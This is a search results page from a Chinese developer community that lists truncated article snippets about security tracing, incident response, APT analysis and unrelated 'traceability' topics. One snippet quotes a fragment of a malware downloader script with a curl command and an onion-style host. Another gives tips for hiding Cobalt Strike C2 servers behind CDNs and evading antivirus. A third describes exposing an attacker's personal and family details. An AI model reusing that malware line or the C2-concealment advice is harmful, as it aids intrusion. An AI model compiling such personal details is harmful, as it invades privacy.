首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏FreeBuf

    溯源复现SiteServer5疑似在野0day

    比如这次深度溯源复现发现疑似在野0day也是让我学到了很多东西。 review梳理攻击过程及各部分安全设备部署的表现 review过程大致如下: ? 漏洞复现 每次被攻击后我们都要进行溯源,加固, 该停用的停用,该修复的修复,安全策略更是上了一波又一波,没想到这次又被传马了,一时间我还有点接受不了,毕竟加固了那么多次还出问题,有点面子挂不住,终于下决心来一起看看源码 id=17851 .NET Framework4.5链接: https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900

    1.1K20发布于 2020-11-16
  • 来自专栏安恒网络空间安全讲武堂

    溯源小记

    溯源的思路 看对方的目的是什么,就是最终目标是做什么。然后根据自己经验 看看达到这个目标 需要进行什么操作 逆推回去。看看这些过程都会留下什么日志。 使用find指令查找限定时间范围的文件 例:查看10分钟内修改过的文件 ➜ html sudo find ./ -cmin -10 -name "*.php" ./1.php 5. 查看登录信息 1. lastlog(查看系统中所有用户最近一次的登录信息) 2. lasstb (查看用户的错误登录信息) 3. last(显示用户最近登录信息) 5.

    86920发布于 2018-09-21
  • 来自专栏安全小圈

    蜜罐溯源

    猜测163邮箱也是该号码‘、QQ号码 支付宝溯源——转账——查找黑客信息 REG007网站: https://www.reg007.com/ 查询邮箱注册过的网站 微博找回密码链接: https:// 0x03溯源结果 结果 ? IP位于湖南长沙 163邮箱、QQ号码、微信号码 手机号 相关好友,母亲信息 他的好友:张*,刘* 人物头像 附件 ? ? ? ? ? ? ? 结束!!!

    1.8K30发布于 2020-08-21
  • 来自专栏腾讯云安全专家服务

    入侵溯源难点和云溯源体系建设

    image.png ---- 3.高效安全溯源技术解决方案,溯源工具是空白。 溯源体系建设应同溯源环节一样,以后置前。 passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200") t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd ---- 5.解决监控节点丢失造成的无数据可查问题 全面地发现安全问题,异构思维是核心。在云上自动化监控节点的保障下,同样需要可灵活配置的半自动化入侵排查工具。 云上入侵溯源体系建设,入侵溯源体系产品化实现已成重要趋势。

    4.4K201发布于 2021-03-16
  • 来自专栏基础项目部署

    centos入侵溯源

    ),然后查看成功登陆的IP中有没有这20和IP1、查看登陆失败最多的top 20 IP(登陆次数大于5次)grep "Failed password" /var/log/secure | grep -oE sort |uniq -c | sort -nr | more#定位有哪些IP在爆破:#grep "Failed password" /var/log/secure|grep -E -o "(25[0-5] \.#(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) \.(25[0-5]|2[0-4] [0-9]|[01]?[0-9][0-9]?)" 09 localhost sudo: good : TTY=pts/4 ; PWD=/home/good ; USER=root ;COMMAND=/sbin/shutdown -r now'''##5

    59520编辑于 2024-08-19
  • 来自专栏只喝牛奶的杀手

    事件溯源模式

    事件溯源模式具有以下优点: 事件不可变,并且可使用只追加操作进行存储。 用户界面、工作流或启动事件的进程可继续,处理事件的任务可在后台运行。 事件溯源不需要直接更新数据存储中的对象,因而有助于防止并发更新造成冲突。 但是,域模型必须仍然设计为避免可能导致不一致状态的请求。 但是,事件溯源事件的级别通常非常低,可能需要生成特定的集成事件。 通过执行响应事件的数据管理任务和具体化存储事件的视图,事件溯源通常与 CQRS 模式结合。 即使事件溯源会最大程度降低数据更新冲突的可能性,应用程序仍必须能够处理由最终一致性和缺少事务引起的不一致性。 尽管这不是事件溯源的主要特点,但却是通常的实施决策。 何时使用此模式 请在以下方案中使用此模式: 要捕获数据中的意图、用途或原因。

    2K40发布于 2019-09-02
  • 来自专栏Cyber Security

    溯源反制】CDN&域前置&云函数-流量分析|溯源

    CDN隐藏C2地址 使用CDN内容分发网络的多节点分布式技术,通过“加速、代理、缓存”隐藏在后面的静态文件或服务;最终实现对外暴露的是CDN多节点的公网域名IP,很难甚至无法溯源真实后端服务器的域名或IP 对外还是可以看到连接域名(下一步就是找到CDN后的真实IP),域名会暴露 子域名、IP历史记录解析查询、网站订阅邮件、网站订阅邮件、国外超级ping、https证书…… 如果使用国内CDN服务,域名必须ICP备案(被溯源的可能性就会更大 关键是使用一个不备案的域名,否则这个方式毫无用处 2、受控主机还是通过我们自己的域名进行回连,对外还是能看到连接域名;且如果使用国内CDN的服务(增加了风险),域名就必须完成ICP备案(增加了风险);而且还有一些方法可能溯源到真实 ,可以联系腾讯云客服配合调查 优点:本方案使用高信誉域名进行连接,通常安全设备很难检测,也很难封堵; 总结 1、不备案的域名+禁用不必要的域名解析记录(防止被溯源收集到更多信息) 2、使用HTTPS通讯 3、C2服务器混淆基础特征-修改profile配置文件,修改ssl证书 4、CS服务端防火墙做策略,仅允许目标主机网段连接,防止其他网段主机对其进行扫描,防溯源 5、加跳板、代理等,当然最重要的是免杀了

    2K10编辑于 2024-07-18
  • 来自专栏网络技术联盟站

    如何配置攻击溯源?

    攻击溯源通过对上送CPU的报文进行采样分析,如果报文速率(pps)超过设置的阈值,则认为是攻击报文。 对攻击报文进行分析,可以找到攻击源的IP地址、MAC地址、接口和VLAN。 auto-defend attack-source命令查看 攻击源惩罚 将攻击报文进行丢弃 将攻击报文进入的接口shutdown (谨慎使用) 其他(配置流策略或者黑名单) 配置思路 创建防攻击策略 配置攻击溯源 (采样比、检查阈值、溯源模式、防范的报文类型、白名单、告警功能、惩罚措施) 应用防攻击策略 操作步骤 <HUAWEI> system-view //进入系统视图 [HUAWEI] cpu-defend 10 //配置攻击溯源采样比 [HUAWEI-cpu-defend-policy-test] auto-defend alarm enable //使能攻击溯源告警功能 ] auto-defend action deny //配置攻击溯源的惩罚措施 [HUAWEI-cpu-defend-policy-test] quit //返回系统视图 [

    1.4K10发布于 2019-11-29
  • 来自专栏专知

    【干货】追本溯源5种受生物启发的人工智能方法

    【导读】1月15日,机器学习研究人员Luke James(简介见文末)发布一篇博文,介绍了5种受到生物启发的人工智能方法,包括人工神经网络(人脑神经元)、遗传算法(DNA染色体)、集群算法(蚁群优化和粒子群优化 5 Ways mother nature inspires artificial intelligence ▌引言 ---- ---- 在人工智能的世界里,有许多东西的存在是因为它在当今技术领域中存在应用场景 ▌5种生物启发的学习算法 ---- ---- 1. 人工神经网络 ---- ? Q学习值更新公式 5. 人工免疫系统 ---- ? 这里我给出了5个受大自然激发的技术的例子。 还有更多的生物启发式算法会影响我们的AI系统,所以对于我遗漏的经验和知识,您可以在评论中分享自己的见解。

    2.3K70发布于 2018-04-12
  • 来自专栏绿盟科技研究通讯

    攻击溯源-手把手教你利用SPADE搭建终端溯源系统

    终端溯源背景介绍 攻击溯源图是描述攻击者攻击行为相关的上下文信息,利用攻击溯源信息来挖掘攻击相关的线索是当前研究的热点。 关于终端溯源的工作学术上已有不少研究工作[1],这里基于SPADE[2]工具以及相关的终端采集工具(windows系统的ProcMon[3],linux系统下的audit[4],camflow[5])搭建一个简单的终端溯源图系统 SPADE可以看成一个分布式的溯源调查工具,以溯源图的形式组织系统日志,溯源攻击过程。该工具支持多种操作系统。SPADE系统支持多种应用,本文只专注其在溯源调查上的应用。 参考文献 1 https://mp.weixin.qq.com/s/cPrgQaTtrZNhe3Iaz6ZN5g 2 https://github.com/ashish-gehani/SPADE 3 https ://docs.microsoft.com/en-us/sysinternals/downloads/procmon 4 https://zhuanlan.zhihu.com/p/337289840 5

    3.1K20编辑于 2023-02-22
  • 来自专栏BennuCTech

    Android事件分发溯源详解

    前两天华仔给我出了一道难题,我们俩研究了小半天,借着这个契机正好回顾了一下Android事件分发的相关知识点,于是有了这篇文章。

    88920编辑于 2021-12-10
  • 来自专栏FreeBuf

    聊聊APT的溯源分析

    之后又有国内外的一些厂商跟踪分析了攻击样本中使用的DGA算法,并通过解密DGA算法,找到了一些受害者客户的数据,至于溯源到的这些客户里有没有误报的,已经不重要了,反正是溯源到了,接着又有越来越多的国内外安全厂商发布了自己的相关报告 ,所以溯源分析也就到此为止了,至于其他的一些什么分析就是纯猜测了,没啥意义,随便怎么猜测都可以,而且就算SolarWinds找专业的安全厂商进行溯源分析,最后的报告也不会对外发布,黑客的攻击手法的相关细节也不会曝光 是怎么攻击的,我还是不知道呀,其实确实也只能做这些,或者说能报道的也只能是这些了,更多的溯源分析大部分安全厂商也没有办法去做,因为SolarWinds没有找他们溯源,其次就算找到了完整的攻击链,你也看不到报告 APT攻击解读 经常在一些安全大会上听到一些人讲APT攻击,以及APT溯源分析啥的,其实一些人还没有搞清楚APT攻击是啥意思,就在谈论APT溯源分析,啥是APT都不知道?为什么叫APT? APT攻击溯源 APT攻击应该如何溯源?

    2K10发布于 2021-01-07
  • 来自专栏C语言

    【Story】编程语言简史:溯源

    5. 1990年代 5.1. Java (1995) Java由Sun Microsystems开发,设计时考虑了平台无关性,允许“一次编写,到处运行”。

    1.1K10编辑于 2024-12-11
  • 来自专栏绿盟科技研究通讯

    攻击溯源-基于因果关系的攻击溯源图构建技术

    文献[4,5,6] 认为将系统上所有与取证相关的事件统一到一个整体日志中可以显著提高攻击调查能力,基于此提出了一种端到端的溯源追踪框架-OmegaLog,该框架集成应用程序事件日志与系统日志构建了一个全局溯源图 zeek-osquery使用流这一术语来表示两台主机之间的通信,该流表示为一个包含IP地址,主机端口和协议相关信息的5元组。使用socket来抽象流。 Socket使用唯一的ID(文件描述符和pid结合),别外还包含相应5元组的属性。进程与socket的信息可以通过监控内核的系统调用(syscalls)获取的。 网络流的socek表示需要匹配相应的5元组。对于发起方,这个socket表示输出流,对于接收方来说该socket是输入流。 图5展示了发起者及其传出socket,接收者及其传入socket模式,以及网络流中完整的5元组。

    3.7K20发布于 2020-09-08
  • 来自专栏网络安全溯源

    网络安全溯源指南

    下载地址:https://github.com/wsfengfan/SecurityTraceability/ 目录 一、 window系统溯源 1、 检查系统账号安全 1.1查看服务器是否存在可疑账号 检查启动项 3.2查看计划任务 3.3排查服务自启动 4、 检查系统相关信息 4.1查看系统补丁信息 4.2查看近期创建修改的文件 二、 Linux系统溯源 1、IP溯源 2、ID溯源 3、手机号溯源 4、EMail溯源 5、域名溯源 6、木马分析(云沙箱)Linux系统溯源排查1、系统排查1.1 系统信息$ lscpu             # 3) 查看可登录账户$ grep '/bin/bash' /etc/passwd(4) 查看空口令账户$ awk -F: 'length($2)==0 {print $1}' /etc/shadow(5) 查看服务$ chkconfig  --list  #查看系统运行的服务  # 0-6表示等级  1 单用户模式  2 无网络连接的多用户命令模式  3 有网络连接的多用户命令模式  4 表示不可用  5

    1K30编辑于 2023-11-20
  • 来自专栏宸机笔记

    入侵溯源之总体概括

    https://github.com/JeffXue/web-log-parser

    69010发布于 2020-11-04
  • 来自专栏SDNLAB

    OpenStack菜鸟笔记:溯源

    OpenStack是一个定位于IaaS(Infrastructure as a Service),旨在为公共及私有云的建设与管理提供软件的开源项目。自2010年发布的第一个A版本,就按照英文字母排序的规律进行版本发布,截至目前已经发布了12个主要版本,现在稳定为每6个月发布一次大的版本更新。 在搜索OpenStack时,会在各种百科中出现这样一个解释:OpenStack是一个美国国家航空航天局(NASA)和Rackspace合作研发的开源云端运算‎软件。“NASA”、“Rackspace”、“开源”这些组合

    1.2K70发布于 2018-04-02
  • 来自专栏Netkiller

    以太坊·食品溯源案例

    以太坊·食品溯源案例 内容摘要 这一部关于区块链开发及运维的电子书。 为什么会写区块链电子书?因为2018年是区块链年。 这本电子书是否会出版(纸质图书)? 您的打赏是我的写作动力:http://www.netkiller.cn/blockchain/donations.html ----------------------------------- 食品溯源案例 背景 需求是通过区块链跟踪产品,实现产品产地,生产,流通等环节溯源。 contract.putLogistics("0x627306090abab3a6e1400e9345bc60c78a8bef57","2018-02-20",1,"XXX屠宰公司");contract.putLogistics("0xc5fdf4076b8f3a5357c5e395ab970b5b54098fef contract.putLogistics("0x627306090abab3a6e1400e9345bc60c78a8bef57","2018-02-20",1,"XXX公司生产");contract.putLogistics("0xc5fdf4076b8f3a5357c5e395ab970b5b54098fef

    1.7K110发布于 2018-03-02
  • 来自专栏游戏安全攻防

    浅谈溯源分析基础技术

    针对恶意样本的溯源分析可以从同源分析、家族溯源、作者溯源这三方面作为突破点进行分析。 同源分析:通过利用恶意样本间的同源关系,挖掘出可溯源痕迹,并根据它们出现的前后关系判定变体来源。 从溯源目标上来看,可分为恶意代码家族溯源及作者溯源。 作者溯源:恶意样本的作者溯源就是通过分析和提取恶意样本中的相关特征,定位出恶意样本作者相关特征,揭示出样本间的同源关系,进而溯源到已知的作者或组织。 网络攻击溯源可以细分为追踪溯源攻击主机、追踪溯源攻击控制主机、追踪溯源攻击者、追踪溯源攻击组织机构。 (图片来源网络) 溯源分析 步骤流程 在获取到可进行溯源的载体后,我们就可以进行对这载体进行溯源分析。针对溯源分析可以由如下四个步骤流程组成。

    2.7K21编辑于 2022-08-31
  • 来自专栏Netkiller

    以太坊·食品溯源案例

    您的打赏是我的写作动力:http://www.netkiller.cn/blockchain/donations.html ----------------------------------- 食品溯源案例 背景 需求是通过区块链跟踪产品,实现产品产地,生产,流通等环节溯源。 contract.putLogistics("0x627306090abab3a6e1400e9345bc60c78a8bef57","2018-02-20",1,"XXX屠宰公司"); contract.putLogistics("0xc5fdf4076b8f3a5357c5e395ab970b5b54098fef contract.putLogistics("0x627306090abab3a6e1400e9345bc60c78a8bef57","2018-02-20",1,"XXX公司生产"); contract.putLogistics("0xc5fdf4076b8f3a5357c5e395ab970b5b54098fef ; // 获得物流经过的转运站数量 用户留言 contract.addGuestbook("0x0d1d423e623d10f9d10f9d10f9d10f9d10f9fba5"

    2.3K220发布于 2018-02-28
领券